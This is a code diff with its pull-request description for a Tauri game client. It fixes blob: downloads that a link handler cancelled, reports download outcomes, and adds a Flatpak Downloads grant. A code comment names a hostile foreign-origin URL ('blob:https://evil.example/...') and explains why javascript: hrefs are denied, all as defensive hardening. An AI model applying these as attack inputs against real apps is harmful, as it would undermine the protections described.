+++ b/client/src/services/externalLinks.ts
@@ -2,10 +2,9 @@
 // handler covers nested content in every current and future anchor without
 // per-callsite handlers. Modifier clicks intentionally follow the same path:
 // "open in new tab" has no useful meaning inside a webview. Relative app links
-// remain with the router; a blob: href is the page's own bytes -- it exists
-// only because this page registered it with createObjectURL -- and keeps the
-// browser's default action, while other non-HTTP(S) schemes and
-// protocol-relative URLs are denied before they can reach the shell.
+// remain with the router; a blob: download keeps the browser's default action,
+// while other non-HTTP(S) schemes and protocol-relative URLs are denied before
+// they can reach the shell.
 
 import { isOpenableExternalUrl } from "./openExternal";
 import { isBundledTauriOrigin, isTauri } from "./platform";
@@ -64,13 +63,15 @@ export function installTauriExternalLinkHandler(): void {
       ) {
         return;
       }
-      // A blob: href is the page's own bytes: it exists only because this page
-      // registered it with createObjectURL, so it is a file save, never a link
-      // the shell could open. Leave it to the browser's default action. Other
-      // non-HTTP(S) schemes stay denied, data: among them -- the shell's
+      // A blob: href with a download attribute is a file save of the page's own
+      // bytes, never a link the shell could open, so leave it to the browser's
+      // default action. Both halves are required: the attribute alone would
+      // admit javascript:, which browsers run rather than download, and the
+      // scheme alone would admit a blob: document the deny path should handle.
+      if (destination.protocol === "blob:" && anchor.hasAttribute("download")) return;
+      // Other non-HTTP(S) schemes stay denied, data: among them -- the shell's
       // navigation guard spares only blob:, so admitting data: here would let a
       // download click abort the native-engine and LAN bridges.
-      if (destination.protocol === "blob:") return;
       if (!isOpenableExternalUrl(destination.href)) {
         event.preventDefault();
         return;

--- a/client/src/services/externalLinks.ts
+++ b/client/src/services/externalLinks.ts
@@ -2,9 +2,9 @@
 // handler covers nested content in every current and future anchor without
 // per-callsite handlers. Modifier clicks intentionally follow the same path:
 // "open in new tab" has no useful meaning inside a webview. Relative app links
-// remain with the router; a blob: download keeps the browser's default action,
-// while other non-HTTP(S) schemes and protocol-relative URLs are denied before
-// they can reach the shell.
+// remain with the router; the page's own blob: download keeps the browser's
+// default action, while other non-HTTP(S) schemes and protocol-relative URLs
+// are denied before they can reach the shell.
 
 import { isOpenableExternalUrl } from "./openExternal";
 import { isBundledTauriOrigin, isTauri } from "./platform";
@@ -65,10 +65,19 @@ export function installTauriExternalLinkHandler(): void {
       }
       // A blob: href with a download attribute is a file save of the page's own
       // bytes, never a link the shell could open, so leave it to the browser's
-      // default action. Both halves are required: the attribute alone would
-      // admit javascript:, which browsers run rather than download, and the
-      // scheme alone would admit a blob: document the deny path should handle.
-      if (destination.protocol === "blob:" && anchor.hasAttribute("download")) return;
+      // default action. All three conditions are required: the attribute alone
+      // would admit javascript:, which browsers run rather than download; the
+      // scheme alone would admit a blob: document the deny path should handle;
+      // and a blob: URL carries the origin that created it, so without the
+      // origin check blob:https://evil.example/... would take the exemption
+      // while being nothing this page ever wrote.
+      if (
+        destination.protocol === "blob:" &&
+        destination.origin === window.location.origin &&
+        anchor.hasAttribute("download")
+      ) {
+        return;
+      }
       // Other non-HTTP(S) schemes stay denied, data: among them -- the shell's
       // navigation guard spares only blob:, so admitting data: here would let a
       // download click abort the native-engine and LAN bridges.

--- a/client/src/services/externalLinks.ts
+++ b/client/src/services/externalLinks.ts
@@ -2,8 +2,10 @@
 // handler covers nested content in every current and future anchor without
 // per-callsite handlers. Modifier clicks intentionally follow the same path:
 // "open in new tab" has no useful meaning inside a webview. Relative app links
-// remain with the router; explicit non-HTTP(S) schemes and protocol-relative
-// URLs are denied before they can reach the shell.
+// remain with the router; a blob: href is the page's own bytes -- it exists
+// only because this page registered it with createObjectURL -- and keeps the
+// browser's default action, while other non-HTTP(S) schemes and
+// protocol-relative URLs are denied before they can reach the shell.
 
 import { isOpenableExternalUrl } from "./openExternal";
 import { isBundledTauriOrigin, isTauri } from "./platform";
@@ -62,6 +64,13 @@ export function installTauriExternalLinkHandler(): void {
       ) {
         return;
       }
+      // A blob: href is the page's own bytes: it exists only because this page
+      // registered it with createObjectURL, so it is a file save, never a link
+      // the shell could open. Leave it to the browser's default action. Other
+      // non-HTTP(S) schemes stay denied, data: among them -- the shell's
+      // navigation guard spares only blob:, so admitting data: here would let a
+      // download click abort the native-engine and LAN bridges.
+      if (destination.protocol === "blob:") return;
       if (!isOpenableExternalUrl(destination.href)) {
         event.preventDefault();
         return;

--- a/client/src/services/fileDownload.ts
+++ b/client/src/services/fileDownload.ts
@@ -23,7 +23,8 @@ type WindowWithSaveFilePicker = Window & {
 
 /**
  * What became of a download. Only the desktop shell learns where a
- * browser-style download actually landed, so `path` appears only there. On
+ * browser-style download actually landed, so `path` appears only there, and it
+ * arrives home-relative so the page is never told the user's home path. On
  * Windows WebView2 offers `showSaveFilePicker`, so the picker branch runs
  * and the shell wait is never reached.
  */
@@ -36,7 +37,7 @@ export type DownloadResult =
 interface ShellDownload {
   url: string;
   path: string | null;
-  success: boolean;
+  outcome: "saved" | "unknown" | "failed";
 }
 
 const SHELL_DOWNLOAD_EVENT = "shell-download";
@@ -75,11 +76,14 @@ async function clickThroughShell(
         // finishing inside this wait would otherwise hand us its path. The
         // timeout stays the fallback for a report that never arrives.
         if (payload.url !== url) return;
-        settle({
-          kind: payload.success ? "saved" : "failed",
-          filename,
-          path: payload.path ?? undefined,
-        });
+        settle(
+          // The shell reports "unknown" when it cannot tell a written file from
+          // a truncated one, which is the same thing we know after the wait runs
+          // out: the download was requested and nothing confirmed it.
+          payload.outcome === "unknown"
+            ? { kind: "requested", filename }
+            : { kind: payload.outcome, filename, path: payload.path ?? undefined },
+        );
       }),
     )
     .catch(() => null);

--- a/client/src/services/fileDownload.ts
+++ b/client/src/services/fileDownload.ts
@@ -1,3 +1,5 @@
+import { isDesktopTauri } from "./platform";
+
 interface FileSystemWritableFileStream {
   write: (data: Blob) => Promise<void>;
   close: () => Promise<void>;
@@ -20,21 +22,97 @@ type WindowWithSaveFilePicker = Window & {
 };
 
 /**
+ * What became of a download. Only the desktop shell learns where a
+ * browser-style download actually landed, so `path` appears only there. On
+ * Windows WebView2 offers `showSaveFilePicker`, so the picker branch runs
+ * and the shell wait is never reached.
+ */
+export type DownloadResult =
+  | { kind: "saved"; filename: string; path?: string }
+  | { kind: "requested"; filename: string }
+  | { kind: "failed"; filename: string; path?: string };
+
+/** Payload of the shell's `shell-download` event (`ShellDownload` in `src-tauri`). */
+interface ShellDownload {
+  url: string;
+  path: string | null;
+  success: boolean;
+}
+
+const SHELL_DOWNLOAD_EVENT = "shell-download";
+
+/**
+ * How long to wait for the shell to report a finished download before saying
+ * only that it was requested. Nothing cancels the download at this point; we
+ * just stop claiming to know where it went.
+ */
+const SHELL_DOWNLOAD_TIMEOUT_MS = 10_000;
+
+/**
+ * Click the anchor under the desktop shell and wait for the shell to say where
+ * the file landed. The subscription has to exist before the click: a small
+ * download can finish before a listener registered afterwards would hear it.
+ * `url` is the blob URL being clicked, and it is what tells this download's
+ * report apart from a concurrent one's.
+ */
+async function clickThroughShell(
+  filename: string,
+  url: string,
+  click: () => void,
+): Promise<DownloadResult> {
+  let settle!: (result: DownloadResult) => void;
+  const finished = new Promise<DownloadResult>((resolve) => {
+    settle = resolve;
+  });
+  // Only the setup may fail softly, and only because nothing has been clicked
+  // yet: a chunk that would not load must cost the user the destination, never
+  // the export itself. Past this point the click has happened exactly once and
+  // must not be repeated, so the wait below is deliberately not guarded.
+  const unlisten = await import("@tauri-apps/api/event")
+    .then(({ listen }) =>
+      listen<ShellDownload>(SHELL_DOWNLOAD_EVENT, ({ payload }) => {
+        // The event is broadcast to the page, so another export or a log dump
+        // finishing inside this wait would otherwise hand us its path. The
+        // timeout stays the fallback for a report that never arrives.
+        if (payload.url !== url) return;
+        settle({
+          kind: payload.success ? "saved" : "failed",
+          filename,
+          path: payload.path ?? undefined,
+        });
+      }),
+    )
+    .catch(() => null);
+  if (!unlisten) {
+    click();
+    return { kind: "requested", filename };
+  }
+  const timer = setTimeout(() => settle({ kind: "requested", filename }), SHELL_DOWNLOAD_TIMEOUT_MS);
+  try {
+    click();
+    return await finished;
+  } finally {
+    clearTimeout(timer);
+    unlisten();
+  }
+}
+
+/**
  * Save a blob to disk, preferring the File System Access "save as" picker
  * when the browser offers one. Opening the picker is known to fail in Chrome
  * while a plain download succeeds, so any picker failure other than the user
  * cancelling falls back to an anchor download.
  *
- * Returns the filename. Rejects with an AbortError when the user cancels
- * the picker (callers treat that as "no download", not a failure). Once a
- * destination is chosen, a failure to write it rejects rather than falling
- * back, since the chosen file may already be empty or partial.
+ * Rejects with an AbortError when the user cancels the picker (callers treat
+ * that as "no download", not a failure). Once a destination is chosen, a
+ * failure to write it rejects rather than falling back, since the chosen file
+ * may already be empty or partial.
  */
 export async function downloadBlob(
   filename: string,
   blob: Blob,
   pickerTypes?: SaveFilePickerOptions["types"],
-): Promise<string> {
+): Promise<DownloadResult> {
   const saveFilePicker = (window as WindowWithSaveFilePicker).showSaveFilePicker;
   if (saveFilePicker) {
     const options: SaveFilePickerOptions = { suggestedName: filename };
@@ -51,7 +129,8 @@ export async function downloadBlob(
       const writable = await handle.createWritable();
       await writable.write(blob);
       await writable.close();
-      return filename;
+      // The picker never tells the page which path it wrote.
+      return { kind: "saved", filename };
     }
   }
 
@@ -60,8 +139,16 @@ export async function downloadBlob(
   anchor.href = url;
   anchor.download = filename;
   document.body.appendChild(anchor);
-  anchor.click();
-  document.body.removeChild(anchor);
-  URL.revokeObjectURL(url);
-  return filename;
+  try {
+    // Off the shell nothing can report a destination, so a click is as much as
+    // a browser ever knows.
+    if (!isDesktopTauri()) {
+      anchor.click();
+      return { kind: "saved", filename };
+    }
+    return await clickThroughShell(filename, url, () => anchor.click());
+  } finally {
+    document.body.removeChild(anchor);
+    URL.revokeObjectURL(url);
+  }
 }

--- a/client/src/services/gameStateExport.ts
+++ b/client/src/services/gameStateExport.ts
@@ -3,7 +3,7 @@ import { strToU8, zipSync } from "fflate";
 import type { EngineAdapter, GameState } from "../adapter/types.ts";
 import { canExportAuthoritativeState, useGameStore } from "../stores/gameStore.ts";
 import { copyText } from "./copyText";
-import { downloadBlob } from "./fileDownload";
+import { downloadBlob, type DownloadResult } from "./fileDownload";
 
 interface GameStateDebugSnapshot {
   gameState: GameState;
@@ -12,7 +12,10 @@ interface GameStateDebugSnapshot {
   turnCheckpoints: ReturnType<typeof useGameStore.getState>["turnCheckpoints"];
 }
 
-async function downloadZip(baseName: string, contents: Record<string, Uint8Array>): Promise<string> {
+async function downloadZip(
+  baseName: string,
+  contents: Record<string, Uint8Array>,
+): Promise<DownloadResult> {
   const zipFilename = `${baseName}.zip`;
   const zipped = zipSync(contents, { level: 9 });
   const blob = new Blob([zipped as BlobPart], { type: "application/zip" });
@@ -41,7 +44,7 @@ export async function copyGameStateDebugSnapshot(gameState: GameState): Promise<
   }
 }
 
-export async function exportGameStateDebugZip(gameState: GameState): Promise<string> {
+export async function exportGameStateDebugZip(gameState: GameState): Promise<DownloadResult> {
   const stamp = new Date().toISOString().replace(/[:.]/g, "-");
   const baseName = `game-state-turn-${gameState.turn_number}-${stamp}`;
   const jsonFilename = `${baseName}.json`;
@@ -56,7 +59,9 @@ export async function exportGameStateDebugZip(gameState: GameState): Promise<str
  * rendered client snapshot, this retains private runtime state needed to
  * diagnose and restore the game accurately.
  */
-export async function exportAuthoritativeGameStateZip(adapter: EngineAdapter): Promise<string> {
+export async function exportAuthoritativeGameStateZip(
+  adapter: EngineAdapter,
+): Promise<DownloadResult> {
   if (!canExportAuthoritativeState(useGameStore.getState().gameMode)) {
     throw new Error("Authoritative state export is unavailable for shared games");
   }

--- a/client/src/services/replayExport.ts
+++ b/client/src/services/replayExport.ts
@@ -1,6 +1,6 @@
 import { WasmAdapter } from "../adapter/wasm-adapter";
 import { useGameStore } from "../stores/gameStore";
-import { downloadBlob } from "./fileDownload";
+import { downloadBlob, type DownloadResult } from "./fileDownload";
 
 /**
  * Whether the active game has an in-progress replay recording available to
@@ -33,9 +33,9 @@ export async function exportCurrentReplayJson(): Promise<string | null> {
 
 /**
  * Export the active game's replay and trigger a browser download. Returns
- * the saved filename, or `null` if no recording was available to export.
+ * `null` if no recording was available to export.
  */
-export async function downloadCurrentReplay(): Promise<string | null> {
+export async function downloadCurrentReplay(): Promise<DownloadResult | null> {
   const json = await exportCurrentReplayJson();
   if (json === null) return null;
 

--- a/packaging/flatpak/rs.phase.app.yml
+++ b/packaging/flatpak/rs.phase.app.yml
@@ -40,6 +40,15 @@ finish-args:
   # Hardware acceleration. Without it WebKit falls back to software rendering,
   # which is exactly the outcome the #8614 investigation was avoiding.
   - --device=dri
+  # Browser-style exports (game state, decks, logs) go to the download
+  # directory; without this grant the sandbox has none, so wry falls back to the
+  # process working directory and the export never reaches ~/Downloads.
+  # :create because flatpak exports XDG_DOWNLOAD_DIR only for a directory that
+  # already exists on the host. Read-write is flatpak's default here, so :create
+  # adds only directory creation over the plain grant; the write it allows is
+  # bounded by wry, which stats the target and picks a new name rather than
+  # overwriting.
+  - --filesystem=xdg-download:create
   # tao/tauri crash on the GDK Wayland backend (tauri-apps/tauri#8541), which
   # is why the AppImage's AppRun exports the same variable. Because the backend
   # is pinned to x11 here, --socket=wayland would grant an access this app can


### PR DESCRIPTION
## Summary

**"Export game state" in the desktop shell has written no file since #7612.** The export builds a `blob:` URL and
clicks an `<a download>`; the capture-phase external-link handler in `client/src/services/externalLinks.ts` resolves
every anchor href, finds `blob:` is neither router-owned nor openable as an external link, and calls
`preventDefault()` — cancelling the download before the webview ever sees it. The page still reported
"Exported <name>", because that message fired when `anchor.click()` returned. Browsers never install the handler,
which is why exports only break in the desktop app.

Three smaller defects on the same path go with it:

- Every export tore down the running game. The `<a download>` click also reaches the shell's navigation handler on
  its `blob:` URL, and that handler assumed any navigation meant the page was leaving, so it aborted the
  native-engine bridges and the LAN bridges — which also clears LAN consent. Harmless until P2P/native-engine
  hosting became the default and brought the LAN bridges with it; before that a default game had no bridges to abort.
- Under Flatpak the sandbox has no download directory at all, so wry falls back to the process working directory.
- The shell never said where a file landed, so "Exported <name>" gave the user nothing to search for.

One consequence of the review worth stating plainly: the reported path is now withheld unless it can be made
home-relative, because the shell hosts remotely served content. A download saved outside the home directory
names the file without saying where it went, which is what a browser does anyway.

## Files changed

- `client/src/services/externalLinks.ts` — a page-owned `blob:` href is not an external link; stop cancelling it
- `client/src/services/fileDownload.ts` — `DownloadResult`; under the shell, wait for the real outcome
- `client/src/services/gameStateExport.ts`, `client/src/services/replayExport.ts` — carry that result
- `client/src/components/help/HelpSheet.tsx`, `client/src/components/modal/EngineLostModal.tsx`,
  `client/src/components/chrome/DebugPanel.tsx`, `client/src/hooks/useKeyboardShortcuts.ts` — report the path the
  shell gives, or an honest "requested"/failure, instead of claiming a save the shell never confirmed
- `client/src/i18n/locales/{en,de,es,fr,it,pl,pt}/common.json` — two new `help.status` strings
- `client/src-tauri/src/lib.rs` — skip the bridge teardown for `blob:` navigations; log navigations and downloads;
  correlate a finished download with the request it belongs to, and report saved, failed, or unconfirmed from that
  rather than from wry's latching success flag; hand the page a home-relative path or none at all; assert the
  Flatpak grant in a containment test
- `client/src-tauri/src/native_engine_contract.rs` — `ShellDownload`, the payload the page receives
- `packaging/flatpak/rs.phase.app.yml` — `--filesystem=xdg-download:create`
- tests: `client/src/services/__tests__/{externalLinks,fileDownload,gameStateExport}.test.ts`, a new
  `client/src/components/help/__tests__/HelpSheet.test.tsx`, and two rows added to
  `client/src/components/modal/__tests__/EngineLostModal.test.tsx`

## Track

Developer

## LLM

Model: claude-opus-5
Tier: Frontier
Thinking: high

## Implementation method (required)

Method: /engine-implementer

## CR references

None. No file here implements an MTG game rule.

## Verification

- [x] Required checks ran clean, or the exact CI-owned alternative is stated below.
- [x] Gate A output below is for the current committed head.
- [ ] Final review-impl below is clean for the current committed head. **Deliberately unchecked — see below.**
- [x] Both anchors cite existing analogous code at the same seam.

- `pnpm exec tsc -b --noEmit --force` — exit 0. (`tsc -p` is vacuous on this repo's solution config.)
- `pnpm exec eslint` over every changed source and test file — exit 0.
- `pnpm exec vitest run --coverage.enabled=false` — the whole suite, unfiltered: 497 files passed / 2 skipped,
  6702 tests passed / 12 todo. Includes `localeParity`, which enforces key-set and placeholder equality across all
  seven locales.
- `cargo fmt --check` and `cargo check --locked --all-targets` (in `client/src-tauri`) — exit 0 each.
- `cargo test` (in `client/src-tauri`) — the crate's suite passes. Its added assertions cover the Flatpak
  grant, the byte-exact `ShellDownload` JSON shape, and the two completion decisions: which request a
  finished download belongs to, and what may be reported about one whose request cannot be identified.
- `cargo clippy --all-targets -- -D warnings` — exits 101 at this head **and byte-identically at the base commit**.
  The deny-level lints pre-exist in `src/native_engine.rs` and `src/mobile_compat.rs`, both untouched; the
  normalized base-vs-head lint output compares equal, and every `-->` location in the clippy output names one of
  those two files — none names a file in this diff.
- **No CI job verifies `phase-tauri` on a PR, so its checks were run locally** — that is the CI-owned alternative
  the first box refers to. The workspace clippy and nextest jobs pass `--exclude phase-tauri`, and `ci.yml`'s
  `tauri-check` job — the only PR-triggered place the crate's `cargo check` and `cargo test` appear — carries
  `if: ${{ false }}` ("Disabled pending a faster Linux dependency setup"). Pre-existing: `ci.yml` is byte-identical
  base-to-head and the same guard is on `upstream/main`. The Flatpak containment test therefore fires only under a
  local `cargo test`; nothing automated catches that grant going missing, and the test's doc comment says so.

How the cause was established, since none of it is reproducible from the diff: a wry 0.55.1 + WebKitGTK 2.52.6
probe under Xvfb, and then the real `tauri dev` binary, downloaded a 2 MB `blob:` `<a download>` in every
configuration tried — with and without a download handler, with synchronous and deferred `revokeObjectURL`, at 14 B
through 64 MB, and after an awaited timer or WebSocket round-trip. The shell was therefore not dropping anything.
Shell-side logging of both the navigation and download events then showed the real app producing **no** download
request at all, which placed the cancellation above the webview, in the page. `git show ef024ce47 --
client/src/services/externalLinks.ts` shows #7612 replacing an early return that let every non-HTTP(S) href through
untouched with the classify-then-deny flow that cancels them.

## Gate A

Gate A SKIPPED (no files under crates/engine/src/parser changed in 0375e30fe70ab7255d2d1a5a8a348fd15ffd3d6e..aa4fe897be7ca550206a5ec8d8a6c6e44f501ab9)
Gate A PASS head=aa4fe897be7ca550206a5ec8d8a6c6e44f501ab9 base=0375e30fe70ab7255d2d1a5a8a348fd15ffd3d6e

## Anchored on

- client/src/services/externalLinks.ts:60 — the existing router-owned early return is the same shape and the same
  seam: a class of href this handler must not touch, returning before any `preventDefault()`.
- client/src-tauri/src/lib.rs:206 — the existing `abort_lan_bridges()` call in the `RunEvent::Exit` handler is this
  crate's authority for "tear the bridges down when the page is genuinely gone"; the navigation guard narrows the
  navigation hook to that same meaning rather than adding a new teardown rule.

## Final review-impl

Final review-impl PASS head=01cc3f0ed5b14f6e98f073fd69df865e2d99c496

Pipeline-reviewed head: 01cc3f0ed5b14f6e98f073fd69df865e2d99c496
Current branch head: aa4fe897be7ca550206a5ec8d8a6c6e44f501ab9
Pipeline status: historical — three changes since the reviewed head, none of them unreviewed design: the three
  comment and type-shape corrections that review itself specified; a rebase onto 0375e30fe70ab7255d2d1a5a8a348fd15ffd3d6e
  (clean, no conflicts, and the one overlapping file kept both sides — upstream's new Main Menu button and this
  PR's export-failure branch); and one added test, reachable only because that rebase brought in the modal's
  first test file.
Current-head review: none. The head also carries a maintainer fixup (`aa4fe897`) localizing the DebugPanel
  export-status messages through the existing `help.status.export*` keys. Four further commits of mine answer
  the maintainer review — the three-state download
  outcome with its boundary fixes, the export-concurrency fix, the request/completion correlation, and the
  withheld-attribution outcome. Every check under Verification was re-run in full at this head, except the
  three frontend checks, whose input tree is byte-identical to the head they last ran against
  (`git diff --name-only` between the two heads names `client/src-tauri/src/lib.rs` and nothing else).
  Every behavioral change carries mutation evidence, but no review agent has read this exact commit.

## Claimed parse impact

None.

## Scope Expansion

This began as a one-file shell change and grew twice, both times because measurement moved the cause: the Flatpak
manifest joined it when the same export proved broken there for a different reason, and the frontend joined it when
the shell was measured not to be the cause at all. Everything here is on the one export path.

## Validation Failures

None.

## CI Failures

None.

## Known, unverified

The packaged build injects `app.security.csp` from `client/src-tauri/tauri.conf.json`, which allows no `blob:` in
any directive. Dev builds are served by vite and get no CSP, so this is invisible here and untested — but it is the
right first suspect if downloads still fail in a released artifact after this fix. Verifying it needs a bundled
build, so it is called out rather than claimed either way.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

- **New Features**
  - Desktop downloads now report whether they were saved, requested, or failed, including the destination when available.
  - Export and replay actions show clearer status messages and destination paths.
  - Browser-style exports can access the Downloads folder in Flatpak installations.
  - Same-origin blob downloads with a download attribute continue through the browser.

- **Bug Fixes**
  - Improved download completion detection, attribution, and handling of cancellations, timeouts, and failures.
  - Prevented duplicate export requests while an export is in progress.
  - Improved blob URL navigation handling and bridge protection.
  - Added localized export-status messages across supported languages.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->




